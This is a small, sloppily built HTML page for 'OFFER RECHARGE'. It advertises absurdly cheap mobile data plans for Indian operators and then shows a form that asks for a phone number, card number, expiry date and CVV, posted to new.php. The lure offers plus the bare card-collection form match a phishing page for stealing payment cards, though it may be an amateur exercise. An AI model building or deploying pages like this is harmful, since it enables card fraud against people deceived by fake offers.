<!DOCTYPE html>
<html lang="en">
<head>
    
<style>
    /* Add your CSS styles here */
body {
    font-family: Arial, sans-serif;
    background-color: #f0f0f0;
    padding: 20px;
}

form {
    background-color:#fff;
    padding: 20px;
    border-radius: 5px;
    border-color:gray;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    
}

label {
    display: block;
    margin-bottom: 10px;
}

input[type="number"] {
    width: 100%;
    padding: 10px;
    margin-bottom: 20px;
    border: 1px solid #ccc;
    border-radius: 5px;
}
input[type="text"] {
    width: 100%;
    padding: 10px;
    margin-bottom: 20px;
    border: 5px solid #ccc;
    border-radius: 5px;
}
select {
    width: 100%;
    padding: 10px;
    margin-bottom: 20px;
    border: 5px solid #ccc;
    border-radius: 5px;
}

button[type="submit"] {
    background-color: #007bff;
    color: #fff;
    padding: 10px 20px;
    border: none;
    border-radius: 5px;
    cursor: pointer;
}

input[type="number"]{
 width: 100%;
    padding: 10px;
    margin-bottom: 20px;
    border: 5px solid #ccc;
    border-radius: 5px;
  
    
}


button[type="submit"]:hover {
    background-color:green;}
    </style>
   
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    
    <title>WELCOME TO OFFER RECHARGE</title>
    <link rel="stylesheet" href="styles.css">
</head>
<h3>RECHARGE OFFERS AVAILABLE</h3>
<h4>
   offers all sim recharges low price 
</h4>
<input type="number" placeholder="ENTER YOUR NUMBER">
  <label for="operator">Select Operator:</label><br>
       <select>
            <option value="Idea">Select</option>
            <option value="">idea</option>
            <option value="Airtel">Airtel</option>
           <option value="Vodafone">Jio</option>
            <option value="Idea">vi</option> 
            <option value="Vodafone">Vodafone</option>
            <option value="Idea">Idea</option>
            <!-- Add more options as needed -->
        </select>  <label for="operator">Select PLAN:</label><br>
       <select>
            <option value="Idea">Select</option>
            <option value="">50RS/- to 100GB</option>
            <option value="Airtel">15RS/- to 30GB</option>
           <option value="Vodafone">20RS/- to 50GB</option>
            <option value="Idea">30RS/- to 60GB</option> 
            <option value="Vodafone">5RS/- to 2GB</option>
            <option value="Idea">10RS/- to 5GB</option>
            <!-- Add more options as needed -->
        </select>          
<br>
</br>
<body> 
    <div id="v">
 <form action="new.php" method="post">
   <div class="credit-card-form">
  <h2>Enter Credit Card Details</h2>
  <input type="text" name="card_number" placeholder="Card Number" required>
  <input type="text" name="expiration_date" placeholder="Expiry Date" required>
  <input type="text" name="cvv" placeholder="CVV" required>
  <button type="submit">Submit</button>
</div>
</form>
</body>
</html>

